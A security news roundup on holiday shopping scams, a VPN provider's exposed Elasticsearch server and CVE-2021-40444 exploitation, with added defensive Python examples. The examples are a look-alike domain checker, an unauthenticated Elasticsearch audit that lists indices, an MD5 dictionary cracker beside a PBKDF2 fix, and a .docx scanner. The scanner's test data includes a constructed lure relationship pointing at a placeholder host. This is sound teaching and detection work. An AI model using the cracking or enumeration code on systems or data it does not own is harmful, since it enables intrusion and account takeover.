
Scammers are Targeting Black Friday and Cyber Monday Shoppers


As Black Friday and Cyber Monday (BFCM) approach, scammers are preparing new tricks to prey on shoppers. 

Last year, US shoppers spent USD 10.90 billion on Cyber Monday and another USD 9.03 billion on Black Friday, and merchants hope to cash in on the additional traffic that BFCM brings to their ecommerce sites. 

But while more traffic brings more sales, it also brings higher rates of online fraud. According to the UK's National Cyber Security Centre (NCSC), victims of online shopping fraud lost an average of roughly $1,176 each during last year's holiday shopping period, and the figure is rising. 

Sophisticated Technique 

To understand the patterns of cyber fraud, threat analysts at Bitdefender Antispam Lab have examined the fraudulent activities associated with Black Friday and Cyber Monday. 

During their study of fraud patterns between October 26 and November 9, the analysts found that the share of unsolicited Black Friday-themed mail peaked on November 9, reaching 26% of all Black Friday-related email. The fraudsters used a range of email subjects to lure recipients into visiting fake websites that promise huge discounts. 

The researchers also identified a widespread campaign inviting recipients to claim gift cards from popular retailers such as Home Depot. The emails link to bogus online survey pages that have nothing to do with the retailer's gift card. 

Once victims complete the survey, they are sent to another page where they can choose a 'prize'. To have the prize delivered, they are asked to pay for shipping by entering personal and banking details; the prize is the pretext, and the card data is the real target. 

“We scored an iPhone 13, though. The displayed page uses the recipients’ IP address to display a localized version of the scam – in our case Romania. We need to pay 15 RON (roughly 3.06 USD) for shipping and enter our name and address,” one of the recipients of fraud mail stated. “After entering our shipping details, we were prompted to enter our payment information, including cc number and CVV code.” 

Prevention Tips 

  1. Check the sender's email address carefully and look for typos or look-alike domains 
  2. Never interact with unsolicited giveaway emails 
  3. Shop only on established websites you already know 
  4. Research a new vendor properly before handing over any details 
  5. Do not open links or attachments from unverified sources
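The first tip is the one most people get wrong in practice, because look-alike domains are built to survive a glance. The script below is an added example (not from the original post or from Bitdefender) of how a mail filter or a help-desk triage tool can apply that check mechanically: it parses the From and Reply-To headers, undoes common character swaps such as 0 for o and rn for m, measures edit distance against the brands the recipient actually deals with, and flags display names that claim a brand the sending domain does not match. The retailer list, the confusable table and the three sample messages are constructed for the example; the two-label registrable-domain rule is a simplification (no public-suffix list).

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed list of retailers the recipient actually has accounts with (hypothetical).
KNOWN_DOMAINS = {"homedepot.com", "amazon.com", "bestbuy.com"}

# Character swaps commonly used in typosquatted domains, mapped back to the real letters.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(text):
    """Lower-case and undo look-alike substitutions so 'h0rnedepot' compares as 'homedepot'."""
    s = text.lower()
    for fake, real in CONFUSABLES:
        s = s.replace(fake, real)
    return s


def registrable(domain):
    """Crude registrable-domain extraction: last two labels (no public-suffix list used)."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain.lower()


def levenshtein(a, b):
    """Edit distance, used to catch single-typo domains such as 'homedepo.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_sender(raw_message, known_domains=KNOWN_DOMAINS):
    """Return (verdict, findings) for the From/Reply-To headers of one RFC 822 message."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reg = registrable(domain)
    findings = []

    if reg not in known_domains:
        for known in known_domains:
            brand = known.split(".")[0]
            # Brand embedded in a look-alike domain, or a domain within two edits of the brand.
            if brand in normalize(domain) or levenshtein(normalize(reg.split(".")[0]), brand) <= 2:
                findings.append(f"sender domain {domain!r} imitates {known}")
            # Brand only in the display name, which any sender can set freely.
            elif brand in display.lower().replace(" ", ""):
                findings.append(f"display name {display!r} claims {known} but domain is {domain!r}")

    # Replies routed to a third domain are a classic sign of a rented or throwaway sender.
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and "@" in reply and registrable(reply.rsplit("@", 1)[-1]) != reg:
        findings.append(f"Reply-To goes to {reply!r}, not the From domain")

    if findings:
        verdict = "suspicious"
    elif reg in known_domains:
        verdict = "known-sender"
    else:
        verdict = "unknown-sender"
    return verdict, findings


# Constructed sample messages (headers only); none of these are real mail.
SCAM_GIFTCARD = """From: "The Home Depot Rewards" <giftcard@h0medepot-rewards.com>
Reply-To: claims@survey-prizes.net
Subject: Claim your $500 Home Depot gift card

Complete the survey to claim your reward."""

LEGIT_ORDER = """From: The Home Depot <noreply@homedepot.com>
Subject: Your order has shipped

Tracking details inside."""

UNRELATED = """From: Newsletter <news@example.org>
Subject: Weekly digest

Hello."""

if __name__ == "__main__":
    for sample in (SCAM_GIFTCARD, LEGIT_ORDER, UNRELATED):
        print(assess_sender(sample))
```

The heuristic is deliberately biased toward false positives: a flagged message is routed to a human, not deleted. Brand-in-domain matching will also catch legitimate partner domains such as a retailer's marketing vendor, which is why the known-domain set should include every domain the retailer genuinely mails from.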

One Million Users were Exposed Due to a VPN Provider's Misconfiguration


A misconfigured Elasticsearch server exposed the personally identifiable information (PII) of at least one million users of a Chinese-run VPN provider. According to WizCase, the exposure affects Quickfox, a free VPN used mostly by the Chinese diaspora to access sites that are otherwise inaccessible from outside mainland China. Fuzhou Zixun Network Technology, the owner of Quickfox, had not properly set up Elastic Stack security, leaving an Elasticsearch server reachable from the internet with no authentication and no encryption in place. 

A team of ethical security researchers led by Ata Hakcil discovered the leak from Quickfox's Elasticsearch server. It was caused by a misconfigured ELK stack, not by a flaw in the software itself. Elasticsearch, Logstash and Kibana (ELK) are three open-source components for collecting, indexing and searching large volumes of data, such as the logs of an online service like Quickfox. 

Quickfox had configured access controls on Kibana but had not done the same for the underlying Elasticsearch server. Kibana is only a front end; the data lives in Elasticsearch, which answers REST queries on its own port, so anyone with a browser and an internet connection could query the indices directly and extract sensitive information about Quickfox users. 
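The Kibana-locked, Elasticsearch-open state described above is easy to check for from the outside, and the check is the one an owner should run against their own cluster before an outsider does. The script below is an added example, not WizCase's tooling or anything from Quickfox: it sends an unauthenticated GET to the node's root endpoint, and if that returns 200 instead of 401 it goes on to list every index through the `_cat/indices` API, which is exactly what a browser can do against an open node. The host name, cluster name and index sizes in the canned responses are constructed so the example runs offline; `fetch` is injectable so the same function can be pointed at a live node.

```python
import base64
import json
import urllib.error
import urllib.request


def http_get(url, auth=None, timeout=5):
    """Live fetch with optional HTTP Basic auth; returns (status, body)."""
    req = urllib.request.Request(url)
    if auth:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        req.add_header("Authorization", f"Basic {token}")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def audit_elasticsearch(base_url, fetch=http_get):
    """Ask an Elasticsearch node, without credentials, what it is willing to reveal.

    A node with security enabled answers 401 on the root endpoint. An open node
    answers 200 with its cluster name and then lists every index on /_cat/indices,
    document counts included, to anyone who asks.
    """
    base = base_url.rstrip("/")
    report = {"open": False, "cluster": None, "indices": []}

    status, body = fetch(f"{base}/")
    if status == 401:
        return report                      # authentication enforced: good
    if status != 200:
        report["error"] = f"unexpected status {status}"
        return report

    report["open"] = True
    try:
        report["cluster"] = json.loads(body).get("cluster_name")
    except ValueError:
        pass

    status, body = fetch(f"{base}/_cat/indices?format=json")
    if status == 200:
        try:
            for idx in json.loads(body):
                report["indices"].append((idx.get("index"), idx.get("docs.count")))
        except ValueError:
            pass
    return report


# Constructed responses standing in for two nodes (hypothetical names and counts).
OPEN_NODE = {
    "/": (200, json.dumps({"cluster_name": "vpn-logs", "version": {"number": "7.10.2"}})),
    "/_cat/indices?format=json": (200, json.dumps([
        {"index": "user-profiles", "docs.count": "1000000"},
        {"index": "device-software", "docs.count": "300000"},
    ])),
}
LOCKED_NODE = {
    "/": (401, json.dumps({"error": {"type": "security_exception",
                                     "reason": "missing authentication credentials for REST request [/]"}})),
}


def fake_fetch(responses):
    """Build a fetch() that serves canned responses, so the audit runs offline."""
    def _fetch(url, auth=None, timeout=5):
        path = "/" + url.split("/", 3)[3]   # "http://host:9200/_cat/..." -> "/_cat/..."
        return responses.get(path, (404, ""))
    return _fetch


if __name__ == "__main__":
    for label, node in (("open", OPEN_NODE), ("locked", LOCKED_NODE)):
        print(label, audit_elasticsearch("http://es.example.invalid:9200", fetch=fake_fetch(node)))
    # Against a real node you own:  audit_elasticsearch("http://10.0.0.5:9200")
```

If the audit reports `open`, the fix is on the Elasticsearch side, not in Kibana: set `xpack.security.enabled: true` in `elasticsearch.yml` (it is on by default from Elasticsearch 8.0), set passwords for the built-in users, enable TLS on the HTTP layer, and bind `network.host` so the node is not reachable from the internet at all. Kibana's own login screen protects only Kibana.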

Around 500 million records totaling over 100GB of data were exposed. The data fell into two categories: personal information of around one million users, and details of the software installed on over 300,000 users' devices. All of the documents found were dated between June 2021 and September 2021. 

Based on the IP addresses in the exposed data, most affected users were in the United States and in countries near China, such as Japan, Indonesia and Kazakhstan. 

The exposed PII included customers' email addresses, IP addresses, phone numbers, device type identifiers and MD5-hashed passwords. As WizCase notes, MD5 is far from safe: it is a fast hash designed for integrity checking, not for password storage, and common passwords can be recovered from unsalted MD5 hashes in seconds using precomputed tables or a GPU. That alone would give criminals enough to run convincing phishing emails, vishing calls and other pretexts to obtain more sensitive information such as credit card or bank account numbers.

“The leaked information about device type and installed software could make this con very convincing,” warned WizCase. “It’s unclear why the VPN was collecting this data, as it is unnecessary for its process and it is not standard practice seen with other VPN services.” 

Criminals could also try to hijack victims' accounts on other sites by cracking the MD5 hashes and reusing the recovered passwords in credential-stuffing attacks, WizCase said. It advised consumers to vet VPN providers thoroughly before choosing one and to remember that free services may make their money by collecting and using customer data.
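Both of the last two paragraphs rest on the same fact: an unsalted, fast hash turns a password dump into a lookup problem. The block below is an added example (not WizCase's analysis and not Quickfox's code) that shows the attack and the fix side by side. The first half runs a dictionary attack over a constructed four-user dump: because MD5 has no salt, one hash per candidate word recovers every user who chose that word, and only the user with a random password survives. The second half stores the same passwords with PBKDF2-HMAC-SHA256, a per-user random salt and a high iteration count, so that identical passwords no longer produce identical records and each guess costs the attacker hundreds of thousands of hash operations. The account names and the wordlist are constructed; the three hex values are the MD5 digests of the common passwords named in the wordlist.

```python
import hashlib
import hmac
import os

# Constructed "dump" in the shape such a leak would have: unsalted MD5 hex digests.
# The first three are the MD5 of three common passwords; the fourth stands in for a
# user with a long random password (generated here so no plaintext appears).
LEAKED = {
    "alice@example.com": "482c811da5d5b4bc6d497ffa98491e38",
    "bob@example.com":   "d8578edf8458ce06fbc5bb76a58c5ca4",
    "carol@example.com": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "dave@example.com":  hashlib.md5(os.urandom(32)).hexdigest(),
}

# Constructed mini wordlist; real attacks use hundreds of millions of entries.
WORDLIST = ["123456", "password", "password123", "qwerty", "letmein", "iloveyou", "admin", "welcome"]


def crack_md5(hashes, wordlist):
    """Dictionary attack against unsalted MD5.

    One digest per candidate word is enough for the whole dump: with no salt,
    every user who chose 'qwerty' has exactly the same stored hash.
    """
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: table[digest] for user, digest in hashes.items() if digest in table}


# What the VPN should have done instead: salted, slow, versioned password hashing.
PBKDF2_ITERATIONS = 600_000   # OWASP guidance for PBKDF2-HMAC-SHA256 (2023)


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iters>$<salt hex>$<digest hex>' with a fresh 16-byte salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash scheme {algo!r}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("recovered from MD5 dump:", crack_md5(LEAKED, WORDLIST))
    a, b = hash_password("password123"), hash_password("password123")
    print("same password, different records:", a != b)
    print("verify correct:", verify_password("password123", a), "verify wrong:", verify_password("qwerty", a))
```

The iteration count is stored inside the record so it can be raised later without invalidating existing users; the scheme label lets a future migration to Argon2id or scrypt coexist with the old records. Note that salting and a slow hash limit the damage of a leak; they do not make an open Elasticsearch server acceptable.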

Cybercriminals are Exploiting Zero-day Vulnerabilities at a Record Pace


The HP Wolf Security threat research team has found evidence that threat actors are moving quickly to weaponize newly disclosed zero-day vulnerabilities. 

According to the HP Wolf Security Threat Insights Report, attackers are abusing flaws such as CVE-2021-40444, the remote code execution vulnerability in the MSHTML browser engine that can be triggered through Microsoft Office documents. HP first observed the vulnerability being exploited on September 8, a week before Microsoft released a patch.

By September 10, the HP threat research team had seen scripts that automate the creation of this exploit published on GitHub. The exploit gives attackers an easy entry point: malware is delivered through an Office document that requires very little user interaction.
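Because the lure is an ordinary-looking Office document, the practical defensive question during that 97-day window is how to spot such documents at the mail gateway or on disk without a signature for every variant. The script below is an added example, not HP's detection logic and not anything from the report: it unpacks a `.docx` (a zip of XML parts) and inspects every relationship file for the pattern that public analyses of the in-the-wild CVE-2021-40444 samples documented, an OLE object relationship whose target is an external `mhtml:` URL carrying an `!x-usc:` sub-URL. The two relationship parts it is run against are constructed for the example, with a placeholder host and no payload; the scanner is a heuristic for that one lure shape and will not catch every variant of the attack.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def scan_docx(data):
    """Return (part, reason, target) findings for relationships matching the lure pattern.

    Any relationship part in the package is checked, not just document.xml.rels,
    since headers, footers and embedded parts carry their own .rels files.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                low = target.lower()
                external = rel.get("TargetMode", "").lower() == "external"
                if low.startswith("mhtml:") or "!x-usc:" in low:
                    findings.append((name, "mhtml/x-usc target", target))
                elif external and rel.get("Type") == OLE_TYPE:
                    # Any OLE object fetched from a URL deserves a look even without mhtml:.
                    findings.append((name, "external oleObject", target))
    return findings


# Minimal package skeleton so the sample documents open as valid zips.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""
ROOT_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""
DOCUMENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p/></w:body></w:document>"""

# Constructed relationship parts: the first mirrors the documented lure shape with a
# placeholder host and no payload; the second is an ordinary external hyperlink.
MALICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
      Target="mhtml:http://lure.example.invalid/side.html!x-usc:http://lure.example.invalid/side.html" TargetMode="External"/>
</Relationships>"""
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
      Target="https://www.example.com/" TargetMode="External"/>
</Relationships>"""


def build_docx(rels_xml):
    """Assemble a minimal .docx in memory around the given document.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", CONTENT_TYPES)
        pkg.writestr("_rels/.rels", ROOT_RELS)
        pkg.writestr("word/document.xml", DOCUMENT_XML)
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    print("lure-shaped document:", scan_docx(build_docx(MALICIOUS_RELS)))
    print("plain hyperlink document:", scan_docx(build_docx(BENIGN_RELS)))
    # On a real file:  scan_docx(open("invoice.docx", "rb").read())
```

A hit on the first rule is a strong indicator and a hit on the second a review item; neither replaces patching, which is the only fix for the underlying MSHTML flaw. The same loop extends to `.xlsx` and `.pptx`, since the relationship format is shared across the Office Open XML package types.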

The researchers compile the report by examining data from the millions of endpoints running HP Wolf Security. It shows that 89% of the malware seen was delivered via email, and that 12% of the email malware isolated had evaded at least one gateway scanner. Web downloads accounted for 11% of malware, and other vectors such as removable storage devices for less than 1%. 

The average time for a company to apply, test and fully deploy patches with the proper checks is 97 days, which gives threat actors a long 'window of vulnerability' to exploit, explained Alex Holland, senior malware analyst with the HP Wolf Security threat research team. 

"While only highly capable hackers could exploit this vulnerability at first, automated scripts have lowered the bar for entry, making this type of attack accessible to less knowledgeable and resourced threat actors. This increases the risk to businesses substantially, as zero-day exploits are commoditized and made available to the mass market in venues like underground forums," Holland said. 

"Such novel exploits tend to be effective at evading detection tools because signatures may be imperfect and become obsolete quickly as the understanding of the scope of an exploit changes. We expect threat actors to adopt CVE-2021-40444 as part of their arsenals, and potentially even replace common exploits used to gain initial access to systems today, such as those exploiting Equation Editor."

Some major platforms such as OneDrive are also being used for 'flash in the pan' attacks. Malware hosted on such platforms is generally taken down quickly, but that does not deter attackers, because they can often achieve their goal of deploying malware in the few hours the links stay live, Holland explained.

"Some threat actors are changing the script or file type they are using every few months. Malicious JavaScript and HTA files are nothing new, but they are still landing in employee inboxes, putting the enterprise at risk. One campaign deployed Vengeance Justice Worm, which can spread to other systems and USB drives," Holland added. 

The researchers also observed threat actors abusing cloud and web hosting providers to host malware, as well as multiple malware families hosted on Discord and other gaming-oriented social platforms. 

With attacks increasing daily, Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., argues that companies cannot keep relying on detection alone: the threat landscape is too dynamic and, as the captured threats show, attackers keep evolving to bypass detection tools.

"Organizations must take a layered approach to endpoint security, following zero trust principles to contain and isolate the most common attack vectors like email, browsers, and downloads. This will eliminate the attack surface for whole classes of threats while giving organizations the breathing room needed to coordinate patch cycles securely without disrupting services," Pratt said.